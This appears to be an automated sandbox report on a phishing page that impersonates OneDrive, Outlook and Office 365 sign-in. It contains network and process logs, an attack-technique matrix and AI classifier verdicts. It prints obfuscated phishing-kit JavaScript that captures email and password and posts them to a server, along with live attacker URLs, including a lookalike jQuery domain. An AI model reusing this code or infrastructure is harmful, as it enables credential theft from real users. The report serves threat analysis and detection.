Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443

Source: unknown

HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49708 version: TLS 1.2

Source: classification engine

Classification label: mal92.phis.win@16/36@14/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1952,i,13083635403947350508,6070381343288843226,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1952,i,13083635403947350508,6070381343288843226,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/outlook.png	100%	Avira URL Cloud	phishing
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/office.png	100%	Avira URL Cloud	phishing
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/mail.png	100%	Avira URL Cloud	phishing
https://code.jquery.com.de/catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410	0%	Avira URL Cloud	safe
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/assets/ms-bg.jpg	100%	Avira URL Cloud	phishing
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/bg.png	100%	Avira URL Cloud	phishing
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/oneDrive.png	100%	Avira URL Cloud	phishing
https://code.jquery.com.de/ip.php	0%	Avira URL Cloud	safe
https://code.jquery.com.de/jquery-3.5.1.min.js	0%	Avira URL Cloud	safe
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/out.png	100%	Avira URL Cloud	phishing
https://code.jquery.com.de/post/index.php?title=Office%20365%20-%20Login&link=https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php&time=2025-1-19%2018:19:38&ip=8.46.123.189%20:%20United%20States	0%	Avira URL Cloud	safe
http://localhost/ali/new/assets/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
grtt.vantechdns.com	172.93.121.124	true	true	unknown
www.google.com	142.250.185.100	true	false	high
code.jquery.com.de	38.34.185.163	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/outlook.png	true	Avira URL Cloud: phishing	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/office.png	true	Avira URL Cloud: phishing	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/	true		unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/mail.png	true	Avira URL Cloud: phishing	unknown
https://code.jquery.com.de/jquery-3.5.1.min.js	false	Avira URL Cloud: safe	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/out.png	true	Avira URL Cloud: phishing	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/assets/ms-bg.jpg	false	Avira URL Cloud: phishing	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/oneDrive.png	true	Avira URL Cloud: phishing	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/bg.png	true	Avira URL Cloud: phishing	unknown
https://code.jquery.com.de/ip.php	false	Avira URL Cloud: safe	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php	true		unknown
https://code.jquery.com.de/catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410	false	Avira URL Cloud: safe	unknown
https://code.jquery.com.de/post/index.php?title=Office%20365%20-%20Login&link=https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php&time=2025-1-19%2018:19:38&ip=8.46.123.189%20:%20United%20States	true	Avira URL Cloud: safe	unknown
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://p.sfx.ms/images/mask_icon.svg	chromecache_73.3.dr	false		high
http://localhost/ali/new/assets/favicon.ico	chromecache_79.3.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/	chromecache_73.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.93.121.124	grtt.vantechdns.com	United States	393960	HOST4GEEKS-LLCUS	true
38.34.185.163	code.jquery.com.de	United States	174	COGENT-174US	false
142.250.185.100	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.4
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1594752
Start date and time:	2025-01-20 00:18:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.phis.win@16/36@14/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195, 172.217.18.14, 108.177.15.84, 142.250.185.142, 216.58.206.42, 142.250.184.227, 184.30.131.245, 199.232.214.172, 142.250.185.206, 142.250.185.234, 142.250.184.234, 142.250.185.170, 142.250.184.202, 142.250.185.202, 216.58.206.74, 142.250.185.138, 172.217.16.202, 142.250.74.202, 216.58.212.170, 142.250.186.74, 142.250.186.170, 142.250.186.42, 172.217.18.10, 142.250.186.106, 216.58.212.138, 142.250.186.110, 216.58.206.78, 142.250.185.227, 142.250.185.238, 13.107.246.61, 184.28.90.27, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data

Input	Output
URL: https://grtt.vantechdns.com Model: Joe Sandbox AI	```json{ "brand": "Vantech", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 2, "spoofed": 1, "reasoning": "The URL 'https://grtt.vantechdns.com' does not exhibit strong visual or structural similarities to any well-known brand. The subdomain 'grtt' does not resemble any known brand name or common subdomain associated with a brand. The main domain 'vantechdns.com' could suggest a legitimate purpose related to technology or DNS services, and there is no clear indication that it is attempting to mimic a well-known brand. The use of 'vantech' in the domain name does not strongly correlate with any globally recognized brand, and the domain extension '.com' is standard. Overall, the URL does not appear to be a typosquatting attempt, as it lacks significant similarity to any known legitimate URL and does not present a high likelihood of user confusion."}
URL: https://grtt.vantechdns.com
URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_8739... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script contains a combination of moderate-risk and low-risk indicators. It retrieves a cookie value and uses it to redirect the user to a specific URL, which could potentially be used for malicious purposes. However, the script does not exhibit any high-risk behaviors like dynamic code execution or data exfiltration. Additionally, the script includes some common web development practices like opening a popup window. Overall, the script requires further review due to the potential for misuse, but it does not appear to be inherently malicious." }
function getCookie(cname) { let name = cname + "="; let decodedCookie = decodeURIComponent(document.cookie); let ca = decodedCookie.split(';'); for(let i = 0; i <ca.length; i++) { let c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } setInterval(function() { if(getCookie("go")) { window.location.replace("https://onedrive.live.com/"); } }, 500) function popupwnd(url, toolbar, menubar, locationbar, resize, scrollbars, statusbar, left, top, width, height) { if (left == -1) { left = (screen.width/2)-(width/2); } if (top == -1) { top = (screen.height/2)-(height/2); } var popupwindow = this.open(url, '', 'toolbar=' + toolbar + ',menubar=' + menubar + ',location=' + locationbar + ',scrollbars=' + scrollbars + ',resizable=' + resize + ',status=' + statusbar + ',left=' + left + ',top=' + top + ',width=' + width + ',height=' + height); } function b(c,d){var e=a();return b=function(f,g){f=f-0x71;var h=e[f];return h;},b(c,d);}var i=b;function a(){var j=['a{color:inherit;text-decoration:none}','97590IBoDuJ','\x20\x20width:\x2034px;','.login-html\x20{','.loginBtn\x20{','\x20\x20position:\x20relative;','A:focus{outline-style:solid;outline-width:1px;outline-color:#5b798a;}','.loginBtn--office:before\x20{','\x20\x20padding:\x200\x2015px\x200\x2046px;','\x20\x20box-sizing:\x20border-box;','\x20\x20\x20\x20\x20\x20</style>','A:link,A:visited{color:#005A95;text-decoration:none;cursor:pointer;}','3840420aDXHeV','\x09position:absolute;','\x20\x20color:\x20#FFF;','\x20\x20background:\x20#FE642E;','\x09text-align:center;','A:visited{color:#005A95;}','.login-form{','border-radius:\x204px;;','DIV,BUTTON{font-size:1rem;}','.login-form\x20.group{','\x20\x20\x20\x20min-height:\x20550px;','\x09position:relative;','\x20\x20background:\x20url(\x27img/outlook.png\x27)\x2014px\x2010px\x20no-repeat;','.login-form\x20.group\x20{','\x09padding:50px\x2070px\x2050px\x2070px;','\x20\x20background:\x20#a0cc70;','\x20\x20margin:\x200.2em;','2895175qdKnth','.loginBtn--outlook:hover,','\x20\x20box-shadow:\x20inset\x200\x200\x200\x2032px\x20rgba(0,0,0,0.1);','HTML{width:100%;height:100%;}','.login-html{','\x20\x20height:\x20100%;','\x09\x20\x20\x20\x20\x20\x20\x20\x20transform-style:preserve-3d;','\x20\x20background:\x20url(\x27img/office.png\x27)\x2013px\x2010px\x20no-repeat;','.loginBtn--other\x20{','.loginBtn--other:before\x20{','\x09width:100%;','\x20\x20content:\x20\x22\x22;','\x20\x20background:\x20#4C4CD5;','BODY{margin:0;}','.login-html,','HTML{font-size:12px;}','\x20\x20position:\x20absolute;','.foot-lnk{','/\x20Other\x20/','\x20\x20background:\x20#628240;','19705ptQkPc','/\x20Facebook\x20/','\x20\x20font-size:\x2022px;','\x09margin-bottom:\x2020px;','/\x20Aol\x20/','.loginBtn:active\x20{','\x20\x20top:\x200;','.loginBtn--office\x20{','/\x20Outlook\x20/','.loginBtn--office:focus\x20{','26jbQgPl','\x20\x20text-align:\x20left;','.loginBtn:focus\x20{','\x20\x20/\x20width:\x2013em;\x20\x20-\x20apply\x20for\x20fixed\x20size\x20/','\x20\x20background:\x20#FF8000;','A:hover{color:#005A95;text-decoration:underline;}','\x09margin-bottom:1px;','\x09\x20\x20\x20\x20\x20\x20\x20\x20','IMG{border:none;vertical-align:middle;}','\x09color:#fff;','.loginBtn--other:focus\x20{','\x20\x20background-size:\x2020px;','9RjNfcV','\x20\x20white-space:\x20nowrap;','\x09margin:auto;','747816IrQlce','BODY{width:100%;height:100%;margin:0;}','.loginBtn:before\x20{','<style>','\x09\x20\x20\x20\x20\x20\x20\x20\x20perspective:1000px;','\x09-webkit-transform-style:preserve-3d;','\x09border-color:#1161ee;','\x20\x20outline:\x20none;','\x20\x20background:\x20#005db3;','\x09-webkit-perspective:1000px;','\x20\x20\x20\x20box-shadow:0\x2012px\x2015px\x200\x20rgba(0,0,0,.24),0\x2017px\x2050px\x200\x20rgba(0,0,0,.19);','\x20\x20line-height:\x2040px;','\x20\x20background:\x20url(\x27img/mail.png\x27)\x20
URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_8739... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It also demonstrates moderate-risk indicators such as external data transmission and aggressive DOM manipulation. While the script appears to have some legitimate functionality, such as form validation and cookie handling, the overall risk score is elevated due to the presence of malicious indicators." }
function a(){var s=['#submit-btn','which','3988180VAsSox','getTime',';path=/','1425496XMnFca','63PUeKrD','length','50INaDZT','802550cWCVYZ','hide','JSON','toUTCString','count','replace','#error','focus','location','success.php','87224rXqxPs','keyCode','next.php','ajax','783EMyNgE','#emaill','val','test','4821414MXLbEs','#psw','1815dGBrRg','POST','82260NvebCJ','ready','show','cookie','click','preventDefault','4958XwXwXu','keypress','expires=','setTime'];a=function(){return s;};return a();}function b(c,d){var e=a();return b=function(f,g){f=f-0x16f;var h=e[f];return h;},b(c,d);}var k=b;(function(c,d){var i=b,e=c();while(!![]){try{var f=parseInt(i(0x17e))/0x1+-parseInt(i(0x171))/0x2(parseInt(i(0x18c))/0x3)+parseInt(i(0x188))/0x4(parseInt(i(0x17d))/0x5)+parseInt(i(0x190))/0x6+-parseInt(i(0x177))/0x7+parseInt(i(0x17a))/0x8(-parseInt(i(0x17b))/0x9)+parseInt(i(0x194))/0xa(parseInt(i(0x192))/0xb);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0xaf259));function setCookie(c,e,f){var j=b;const g=new Date();g[j(0x174)](g[j(0x178)]()+f0x180x3c0x3c0x3e8);let h=j(0x173)+g[j(0x181)]();document[j(0x197)]=c+'='+e+';'+h+j(0x179);}$(document)[k(0x195)](function(){var l=k;window[l(0x182)]=0x0,$(document)[l(0x172)](function(c){var m=l,d=c[m(0x189)]?c[m(0x189)]:c[m(0x176)];d=='13'&&(c[m(0x170)](),$(m(0x175))[m(0x16f)]());}),$(l(0x175))[l(0x16f)](function(c){var n=l;c[n(0x170)]();var d=$(n(0x18d))[n(0x18e)](),e=$(n(0x191))[n(0x18e)](),f=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!f[n(0x18f)](d)\|\|e[n(0x17c)]<0x5)return $(n(0x184))[n(0x196)](),$(n(0x18d))[n(0x185)],![];else $[n(0x18b)]({'dataType':n(0x180),'url':n(0x18a),'type':n(0x193),'data':{'ai':d,'lg':'0','pr':e},'beforeSend':function(g){var o=n;$(o(0x184))[o(0x17f)]();},'success':function(g){var q=n;count==0x1?setTimeout(()=>{var p=b;window[p(0x186)][p(0x183)](p(0x187)),setCookie('go','go',0x1e);},0x1f4):($(q(0x191))[q(0x18e)](''),$(q(0x184))[q(0x196)](),window[q(0x182)]+=0x1);},'error':function(){var r=n;$(r(0x191))[r(0x18e)](''),$(r(0x184))[r(0x17f)]();},'complete':function(){}});});});
URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sign in to Continue to OneDrive Online.", "prominent_button_name": "Sign in with Outlook", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "file hosting" }

URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "User authentication is required to download this file", "prominent_button_name": "Sign in & Download", "text_input_field_labels": [ "Email, phone, or Skype", "I forgot my password !" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "file hosting" }

URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Model: Joe Sandbox AI	{ "brands": [ "OneDrive", "Microsoft" ] }
	{ "brands": [ "OneDrive", "Microsoft" ] }
URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php Model: Joe Sandbox AI	{ "brands": [ "Outlook" ] }
	{ "brands": [ "Outlook" ] }
URL: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php Model: Joe Sandbox AI	```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Outlook' is well-known and is associated with Microsoft.", "The legitimate domain for Outlook is 'outlook.com'.", "The provided URL 'grtt.vantechdns.com' does not match the legitimate domain for Outlook.", "The domain 'vantechdns.com' does not have any known association with Microsoft or Outlook.", "The presence of input fields for email and password recovery is typical for phishing sites attempting to capture user credentials.", "The URL contains a subdomain 'grtt' which is not related to Outlook, increasing suspicion." ], "riskscore": 9} Google indexed: False
URL: grtt.vantechdns.com Brands: Outlook Input Fields: Email, phone, or Skype, I forgot my password !

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	403295
Entropy (8bit):	5.185720161463881
Encrypted:	false
SSDEEP:	12288:IgVvLfkzPD5peUX1y4xaxuRM6HtyKu57TR:nkzPD5pedT
MD5:	D735285640B4136D2176AA494F0F39DE
SHA1:	662AACE89BFB66CFA74931E9309FA872900E10B5
SHA-256:	2DFEF129DBE4C4F0AB2B2B0E67024E9486AF9E29392A8A890DA025E2BCAFCD18
SHA-512:	1A7D9B826C930DE2853129F7F8866520CCC6AD983FC82F255F8F10CBB8A8A05DFAC6FC311340DC65051FDC330B7BD0FA4B38537F03F387ADA78D5FC1C247C208
Malicious:	false
Reputation:	low
Preview:	function _0x171d(_0x14526a,_0x3bbd88){var _0x1604d8=_0x3fa8();return _0x171d=function(_0x2be7df,_0x1bddd6){_0x2be7df=_0x2be7df-(-0x2e0x1f+0x60x40b+-0x11810x1);var _0x2abeb9=_0x1604d8[_0x2be7df];return _0x2abeb9;},_0x171d(_0x14526a,_0x3bbd88);}var _0x391389=_0x171d;(function(_0x2d2242,_0x3e4551){var _0x2498f5=_0x171d,_0x1b4406=_0x2d2242();while(!![]){try{var _0x1b7a18=parseInt(_0x2498f5(0x5db))/(-0x26ed+-0xae+0x1a0x186)(-parseInt(_0x2498f5(0x531))/(-0x863+0x6b4+0x1b1))+-parseInt(_0x2498f5(0x474))/(0x180f-0x1+-0x12f10x2+-0xc64-0x5)+-parseInt(_0x2498f5(0x283))/(0x7520x5+0xc57+-0x30ed)(-parseInt(_0x2498f5(0x411))/(0x1-0x1724+-0x8a-0x1a+-0x1-0x925))+-parseInt(_0x2498f5(0x161))/(-0x11-0x22d+0x58-0x18+0x1cb7-0x1)(parseInt(_0x2498f5(0x517))/(0x3b9+0xe20xc+-0xe4a))+-parseInt(_0x2498f5(0x1d3))/(0x1-0x15a2+-0x10x13e1+0x298b)(-parseInt(_0x2498f5(0x15c))/(-0x66a+0x5f20x2+-0x571))+parseInt(_0x2498f5(0x144))/(-0x60x359+-0xbf-0xa+-0x1-0xcaa)+-parseInt(_0x2498f5(0x2bb))/(0x2-0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 20, 2025 00:19:10.870811939 CET	53	53657	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:10.881809950 CET	53	64777	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:11.887703896 CET	53	65177	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:14.868765116 CET	54650	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:14.868910074 CET	56763	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:14.875612974 CET	53	54650	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:14.876064062 CET	53	56763	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:16.113327026 CET	58149	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:16.113845110 CET	63828	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:17.134267092 CET	61912	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:17.134821892 CET	60430	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:17.573574066 CET	53	58149	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:17.590353012 CET	53	63828	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:18.607362986 CET	53	61912	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:18.610970020 CET	53	60430	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:18.804125071 CET	53	50369	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:20.787309885 CET	49368	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:20.787458897 CET	60582	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:22.288212061 CET	64011	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:22.288425922 CET	60950	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:22.394773006 CET	53	60582	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:22.417427063 CET	53	49368	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:23.711771011 CET	53	60950	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:23.934273958 CET	53	64011	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:28.982958078 CET	53	50341	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:33.705326080 CET	63573	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:33.705521107 CET	62336	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:34.164350986 CET	53	63573	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:34.175322056 CET	53	62336	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:36.146842003 CET	52803	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:36.147061110 CET	57348	53	192.168.2.6	1.1.1.1
Jan 20, 2025 00:19:36.154133081 CET	53	57348	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:36.230348110 CET	53	57264	1.1.1.1	192.168.2.6
Jan 20, 2025 00:19:36.588169098 CET	53	52803	1.1.1.1	192.168.2.6
